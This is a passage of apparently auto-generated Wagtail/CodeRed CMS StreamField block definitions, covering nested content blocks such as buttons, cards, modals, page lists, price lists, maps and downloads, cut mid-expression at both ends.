wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), ('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], label='Content'))])), ('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', 